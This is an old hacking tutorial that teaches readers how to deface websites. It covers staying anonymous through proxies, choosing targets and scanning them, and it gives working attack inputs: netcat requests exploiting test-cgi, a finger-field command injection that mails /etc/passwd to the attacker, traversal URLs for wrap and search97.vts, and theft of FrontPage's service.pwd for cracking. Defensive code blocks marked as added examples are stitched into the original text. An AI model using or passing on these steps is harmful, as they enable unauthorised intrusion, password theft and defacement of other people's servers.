-=Simple Ways of Web Page Hacking=-
-=Part 1 : Some CGI Exploits, FP extensions and Finger=-
-=www.hack2600.com/remote, www.orky.co.uk=-
It happens all the time: hundreds of websites are defaced
or changed daily. I intend to show some of the ways of
doing this yourself here. If this guide gets a favorable
response it will run until I've used up all of my
material. I've put sites with all the files/programs used
at the bottom in Appendix 1.
Stage 1 : Make sure you're anonymous.
The worst thing you can do is go straight out and try
what is here without making sure you're anonymous. You
need [and should already have] these:
An anonymous proxy server or two - fully anonymous: no IP
address, no browser details passed on. Get them for HTTP -
ports 8080, 3128, 8000. SOCKS - port 1028.
A copy of SocksCap - this allows you to run any Win32
program through a SOCKS proxy. I don't know whether a
program like this exists for Linux or not.
A Wingate or two - use these for telnetting or FTPing
anonymously.
A web-based and therefore anonymous e-mail account.
Stage 2 : Gather Information
To start with you need to find the web page you intend
to hack. I recommend using AltaVista to find a suitable
target: do a URL: search to find pages in that domain.
For example URL: .gov would return web pages in the .gov
domain.
When you have found a target, do a DNS lookup to find
out its IP address - it's easy to do so I won't cover it
here. Then run whatever port scanner you use to check it
over. You need to find out what services the server is
running. You'll normally get a list of ports; we only
need to know whether it is running these: FTP, which is
port 21, HTTP, which is port 80, and finger, which is
port 70.
If they are running FTP, telnet to them [telnet
www.target.com 21] and enter the command 'SYST'; this
sometimes returns the OS type. I always try an anonymous
login - it's amazing how many dozy admins leave the
anonymous/guest account with full permissions.
User Anonymous
User Anonymous allowed, please enter full e-mail
address as password
Pass [normally blanked out]
Anonymous login allowed, access restrictions apply
[this means that it's not going to work]
If you log in and get the directory listing for / [root]
you don't have to bother with the rest of this guide,
just upload your own index.html file. I recommend
renaming the old file to index.old instead of deleting
it.
Now it's a good idea to find out what's in the server's
cgi-bin. First try www.target.com/cgi-bin/ and
www.target.com/scripts/ in your web browser - you may
get a directory listing. It's very unlikely, but if you
are lucky it'll save you time later.
If you get nothing, try the following URLs in your
browser. These are only a few of the URLs to try; see
Appendix 2 for a full list. You can get script kiddie
programs to do this for you. They are useful [if
slightly lame] if you need to check a server quickly.
http://www.target.com/cgi-bin/test-cgi
[remote file listing]
http://www.target.com/cgi-bin/nph-test-cgi
http://www.target.com/carbo.dll
http://www.target.com/cgi-bin/perl.exe
http://www.target.com/scripts/CGImail.exe
http://www.target.com/cgi-bin/search97.vts
http://www.target.com/cgi-bin/finger
http://www.target.com/_vti_inf.html
http://www.target.com/wrap.cgi
If you get anything except a 400, 403 or 202 error
message then the server is running that service. I'll
go into detail about how to exploit that in the next
section. If you find the server is running either of
the test-cgi scripts then we can get a full file
listing of the cgi-bin, which tells us exactly what the
server is running. Here's how to do it.
echo "GET /cgi-bin/test-cgi?/*" | netcat www.target.com 80
This sends a listing of the / [root] directories to
the target machine's HTTP connection - which we are
connected to :o)
We list the cgi-bin [or the directory where the scripts
are] by doing
echo "GET /cgi-bin/test-cgi?*" | netcat www.hackme.com 80
Again the same thing. This exploit works because the
script does not enclose the argument to its 'echo'
command inside quotes, so shell expansion is possible.
Unfortunately we can't escape to the shell as it only
affects the echo line [ echo QUERY_STRING =
$QUERY_STRING ].
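The quoting bug described above, reproduced as an added example (not code from the original text or from test-cgi itself) inside a throwaway directory, with the one-character fix beside it; the file names in the scratch directory are constructed for the demonstration.

```sh
#!/bin/sh
# Added example, not from the original text: the test-cgi flaw is an unquoted
# variable in an echo. It is reproduced here inside a throwaway directory so
# the glob expands against files we create, never against a real server.

# Build a constructed scratch "cgi-bin" holding a few files to expand against.
setup_dir() {
  d=$(mktemp -d)
  touch "$d/test-cgi" "$d/nph-test-cgi" "$d/wrap"
  printf '%s' "$d"
}

# Vulnerable form (the line the guide quotes): $QUERY_STRING is unquoted, so a
# query of "*" is expanded by the shell into a file listing before echo runs.
vulnerable_echo() {
  QUERY_STRING=$1
  echo QUERY_STRING = $QUERY_STRING
}

# Hardened form: double-quoting the expansion passes the literal text through,
# so the same query prints as "*" and no directory contents leak.
hardened_echo() {
  QUERY_STRING=$1
  echo "QUERY_STRING = $QUERY_STRING"
}

# Stand-alone demonstration: run both forms from inside the scratch directory.
demo() {
  dir=$(setup_dir)
  (cd "$dir" && vulnerable_echo '*' && hardened_echo '*')
  rm -rf "$dir"
}
demo
```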
Stage 3 : Carry out the exploitation / defacement.
In this section you're going to hear /etc/passwd and the
passwd file mentioned a lot. If you're new to *nix then
read the next section and I'll explain what it is.
The 'passwd' file is the listing of accounts and
passwords on a *nix machine. They're all encrypted, but
it can be cracked [brute forced] quite easily.
The encryption is 'one way': this means that the
passwords can only be encrypted by the machine and not
decrypted by it. What the cracking program does is
encrypt a password from a dictionary file and compare
it to the already encrypted password in the passwd
file. If they match, it's the right password.
A passwd file looks like this when opened in any text
editor:
root:D943/sys34:0:1:0000:/:
sysadm:k54doPerate:0:0:administration:usr/admin:/bin/rsh
checkfsys:Locked;:0:0:check file system:/usr/admin:/bin/rsh
john:chips11:34:3:john scezerend:/usr/john
It is always in the form:
userid:password:userid#:groupid#:GECOS field:home dir:shell
What each of these fields means:
userid - the user name, entered at login.
password - the password, written here in encrypted form.
userid# - a unique number assigned to each user, used
for permissions.
groupid# - similar to userid#, but controls the group
the user belongs to.
GECOS field - this is where information about the user
is stored, usually in the format full name, office
number, phone number, home phone. Also a good source of
information for guessing/cracking the password.
home dir - the directory the user is put into when they
log in to the system.
shell - the name of the shell which is automatically
started for the login.
Some [most] of the time you will get a passwd file that
looks like this.
root:*:0:1:0000:/:
sysadm:*:0:0:administration:usr/admin:/bin/rsh
checkfsys:*;:0:0:check file system:/usr/admin:/bin/rsh
john:*:34:3:john scezerend:/usr/john
This is called a 'shadowed' passwd file. The passwords
are not entered in this file; instead it's a symbolic
link [a shadow of] the actual passwd file, which is
stored elsewhere. It's no use, so give up and try
another exploit.
That's it for the passwd file.
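As an added example (not from the original text), a small parser for the seven-field format described above, run over a file constructed from the guide's own sample entries plus one shadowed "www" account; it separates shadowed or locked password fields from ones that still carry a value, flags extra uid-0 accounts, and reports malformed lines (the guide's "john" line, as printed, has only six fields).

```python
from dataclasses import dataclass

# Sample file constructed for this example from the entries shown in the guide
# (its made-up password values), plus one shadowed "www" account added here.
SAMPLE_PASSWD = """\
root:D943/sys34:0:1:0000:/:
sysadm:k54doPerate:0:0:administration:usr/admin:/bin/rsh
checkfsys:Locked;:0:0:check file system:/usr/admin:/bin/rsh
john:chips11:34:3:john scezerend:/usr/john
www:*:101:1:web server:/var/www:/bin/sh
"""

@dataclass
class PasswdEntry:
    user: str
    pw_field: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str

    @property
    def state(self):
        if self.pw_field == "":
            return "empty"             # account has no password at all
        if self.pw_field in ("x", "*") or self.pw_field.startswith("!"):
            return "shadowed/locked"   # hash kept elsewhere, or login disabled
        return "hash-present"          # crackable value in a world-readable file

def parse_passwd(text):
    """Parse user:password:uid:gid:gecos:home:shell lines; report malformed ones."""
    entries, problems = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        fields = line.split(":")
        if len(fields) != 7:
            problems.append(f"line {lineno}: expected 7 fields, got {len(fields)}")
            continue
        user, pw, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(user, pw, int(uid), int(gid), gecos, home, shell))
    return entries, problems

def audit(entries):
    # Findings an admin wants: exposed or empty passwords and extra uid-0 accounts.
    findings = []
    for e in entries:
        if e.state in ("hash-present", "empty"):
            findings.append(f"{e.user}: password field is {e.state}")
        if e.uid == 0 and e.user != "root":
            findings.append(f"{e.user}: uid 0 account besides root")
    return findings
```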
You should by now have a list of what the server is
running. Cross-reference this with your list of
exploits. Again, see Appendix 1 for a URL if you haven't
got them already. I'll go over finger, wrap,
search97.vts and FrontPage extensions.
Finger - Connect to
http://www.target.com/cgi-bin/finger in your browser.
You'll probably be presented with a text box on an HTML
page.
You need to find a VALID e-mail address for the server
first; it's easy to do, just look for a 'contact'
section on the web page. Then type this in the text
[finger] box.
[email protected] ; /bin/mail [email protected] < etc/passwd
Replace the e-mail addresses with the one you found
and your own [the anonymous one]. If it works you'll get
the /etc/passwd file in your mail. Then run a *nix
password cracker against it.
What the line above does is take the password file
through the e-mail address you found
[[email protected]] and send it to your e-mail.
Wrap - This is one of the simplest exploits going.
Just enter this in your browser to view the contents
of /etc. You can then [sometimes] grab the /etc/passwd
file. Then all you need to do is run your *nix passwd
cracker on it.
http://www.target.com/cgi-bin/wrap?/../../../../../etc
You can replace the /etc and the number of /../ to get
different directories as well.
Search97.vts - Yet again this grabs the /etc/passwd
file. If the server you are trying to hack is running
Search 97 [or a variant of it] then this should work.
Type this in your browser:
http://www.target.com/search97.vts?HLNavigate=On&querytext=dcm&ServerKey=Primary&ResultTemplate=../../../../../../../etc/passwd&ResultStyle=simple&ResultCount=20&collection=books
It looks really complex there, but if we split it up a
bit it's quite simple.
http://www.target.com/search97.vts
?HLNavigate=On&querytext=dcm
&ServerKey=Primary
&ResultTemplate=../../../../../../../etc/passwd
&ResultStyle=simple
&ResultCount=20
&collection=books
The exploit tells Search 97 to do a search in the books
category and use a certain file as the template for
showing the results in - in this case /etc/passwd.
Instead of getting your search results you get the
passwd file displayed on screen.
FrontPage Extensions - Servers with the FrontPage
extensions [counters etc] on them are exceptionally
vulnerable, well what do you expect from Micro$oft?
The FrontPage extensions allow the main FrontPage
program to connect to the server and alter pages on
it. It's part of the 'webs' tool. The extensions make
the server act like another directory on your
computer.
Normally this connection process has a password to
stop hackers from doing this, but as it is a Micro$oft
product that option is well hidden and out of sight.
So here's what we do:
First you must have a full copy of FrontPage.
Now you need one of the proxies you got earlier. Once
you have this, run FrontPage.
Click Tools - Options - Proxy Settings - Settings, and
then put in the information for your proxy.
When you have it set up, go File - Open - then on the
dialog box click 'Web Folders'.
Once you have done that, click the "Open File" folder
icon at the top right.
A dialog box will pop up; in that put the host name of
your site, say www.target.com, then click Add.
This might take a minute. What will happen now is
either it will automatically add it and put you in
edit mode, or a box will come up prompting you for a
username/password.
If you are in edit mode then you are in. If not, carry
on.
Run your browser and go to
http://www.target.com/_vti_pvt/service.pwd
You will see something like username:g87ouLk098 if the
file is world readable. The "g87ouLk098" would be the
encrypted password.
Put this into the same form as a Unix passwd file, for
example
username:g87ouLk098:0:0:comments:/:/bin/bash
Save the file and crack the password. When you have it,
go through the procedure again, this time putting in
the password you cracked.
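From the server side, every request in Stage 2 and Stage 3 leaves a recognisable line in the web server's access log. As an added example (not part of the original guide), a scanner over constructed Common Log Format lines that flags the test-cgi glob, the wrap and search97.vts traversal, the _vti_pvt/service.pwd fetch and a shell metacharacter in a finger query, then ranks source addresses by how many distinct probe types they tried; addresses, timestamps and sizes are made up.

```python
import re
from urllib.parse import unquote

# Constructed Common Log Format lines (addresses, dates and sizes are made up)
# reproducing the request shapes this guide walks through, plus benign traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2000:13:55:36 +0000] "GET /index.html HTTP/1.0" 200 2326
203.0.113.5 - - [10/Oct/2000:13:55:40 +0000] "GET /cgi-bin/test-cgi?* HTTP/1.0" 200 512
203.0.113.5 - - [10/Oct/2000:13:55:41 +0000] "GET /cgi-bin/wrap?/../../../../../etc HTTP/1.0" 200 880
203.0.113.5 - - [10/Oct/2000:13:55:42 +0000] "GET /search97.vts?querytext=dcm&ResultTemplate=../../../../../../../etc/passwd HTTP/1.0" 200 1400
203.0.113.5 - - [10/Oct/2000:13:55:43 +0000] "GET /_vti_pvt/service.pwd HTTP/1.0" 200 64
198.51.100.9 - - [10/Oct/2000:13:56:01 +0000] "GET /cgi-bin/finger?user%3B%2Fbin%2Fmail HTTP/1.0" 200 300
198.51.100.9 - - [10/Oct/2000:13:56:05 +0000] "GET /search97.vts?querytext=dcm&collection=books HTTP/1.0" 200 5100
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

def classify(url):
    """Return the names of every probe pattern the decoded request matches."""
    script, _, query = unquote(url).partition("?")
    hits = []
    if script.endswith("test-cgi") and any(c in query for c in "*?["):
        hits.append("test-cgi glob listing")          # unquoted echo expands the glob
    if "../" in query:
        hits.append("directory traversal in query")   # wrap / search97 ResultTemplate
    if script.endswith("/_vti_pvt/service.pwd"):
        hits.append("FrontPage password file request")
    if script.endswith("/finger") and ";" in query:
        hits.append("shell metacharacter in finger query")
    return hits

def scan_log(text):
    """Return (ip, status, pattern, url) for every suspicious request line."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for name in classify(m["url"]):
            findings.append((m["ip"], m["status"], name, m["url"]))
    return findings

def hosts_by_probe_count(findings):
    """Rank source addresses by how many distinct probe patterns they tried."""
    per_host = {}
    for ip, _, name, _ in findings:
        per_host.setdefault(ip, set()).add(name)
    return sorted(((len(v), ip) for ip, v in per_host.items()), reverse=True)
```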
By now you should have got somewhere into the server.
I'll have more next month, including 4 more exploits
and an intro to *nix hacking!!
-=Orky=-
Appendix 1 :
Exploits list : www.hack2600.com/remote/exp.html
More Exploits : www.rootshell.org,
www.securityfocus.com, www.hack2600.com
Cracking Programs - John the Ripper : www.hackers.com,
www.blackcode.com, www.wi2000.com, www.dhn.com
SocksCap - www.nec.com
Script Kiddie Programs : www.infowar.com/thc,
www.void.da.ru
Appendix 2 :
These are all exploits available on
www.hack2600.com/remote.
BNB Form
Campus.cgi
Classifieds.cgi
Count.cgi
EWS (Excite for webservers)
Fax
Survey.cgi
Glimpse HTTP
Handler.cgi
HTML Script
info2www
Perl.exe
PFDisplay
PHF PHP
Test-cgi
Textcounter.cgi
Uploader.exe
webdist.cgi
webgais
websendmail
wwwboard
wwwcount
Altavista Search (for businesses)
Anyform.cgi
Carbo.dll
ASP ads
Perfomer.cgi
CF 40
SGI-handler
Hyperseek
view-source
Irix (wrap)
Web site pro
www-sql
search 97.vts
wwwthreads
somecgi
convert-bas
http request_method
mini-sql 3.0
valueclick.cgi
responder
webcom-guestbook
whois-raw
webmin
Compaq Insight Manager
Newdsn and Getdrvrs
Win NT Counter
Index Server Exploit
IIS Showcode
Test.cgi and nph-test.cgi
RealMedia Server
formmail.pl
Shopping Carts
Domino 4.6
Coldfusion 4.0
guestbook.pl
PWS 3.0
Samba server
IIS Upgrade
IIS 1 and 2
CGIC
Any Form (eg *.pl)
Cgimail.exe

© 2003 satan13. All rights reserved.